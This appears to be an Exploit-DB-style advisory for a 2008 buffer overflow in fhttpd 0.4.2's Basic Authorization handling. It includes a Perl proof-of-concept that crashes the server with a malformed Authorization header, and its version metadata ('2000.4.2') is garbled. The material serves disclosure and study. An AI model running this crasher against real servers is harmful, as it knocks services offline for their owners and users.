fhttpd 0.4.2 - 'Basic' Authorization Buffer Overflow

vendor:

fhttpd

by:

Jeremy Brown

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: fhttpd

Affected Version From: 2000.4.2

Affected Version To: 2000.4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:fhttpd:fhttpd:0.4.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2008

fhttpd 0.4.2 – ‘Basic’ Authorization Buffer Overflow

A buffer overflow vulnerability exists in fhttpd 0.4.2 when handling 'Basic' Authorization. An attacker can send a specially crafted 'Basic' Authorization header with a large amount of data, which can cause a stack-based buffer overflow. This can allow an attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of fhttpd.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

#http://www.fhttpd.org / fhttpd-0.4.2.tar.gz (WARNING: VERY OLD)
#Program received signal SIGSEGV, Segmentation fault.
#0x0804b42d in un64 (s=0x809b2d2 "") at util.cc:69

#69       if(c2!=-2) c3=rptr[3]; else c3=-2;
#(gdb) bt
#0  0x0804b42d in un64 (s=0x809b2d2 "") at util.cc:69
#1  0x080672bf in ControlFTPServerApp::process_get_line (this=0x8089678, 
#fhttpd.cc:2044

#3  0x08060190 in Wheel::onepass (this=0x8081338) at sockobj.cc:1953
#4  0x08073c14 in main (argc=1, argv=0xbffff464, env=0xbffff46c) at fhttpd.cc:3645
#One of the near useless bugs found by my fuzzer with http fuzz capabilities

# Crashes with { } | [ ] \ ; : ' " < > ? , . OR with just a space after Basic:

use IO::Socket;

if(@ARGV < 1)
{

     print "\nUsage: host\n\n";
     exit(1);

}

$host    = $ARGV[0];
$port    = 80;

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host, PeerPort=>$port)
or die "\nError: socket\n\n";

print $sock "HEAD / HTTP/1.1\r\nAuthorization: Basic |\r\n\r\n";
close($sock);

# milw0rm.com [2008-09-19]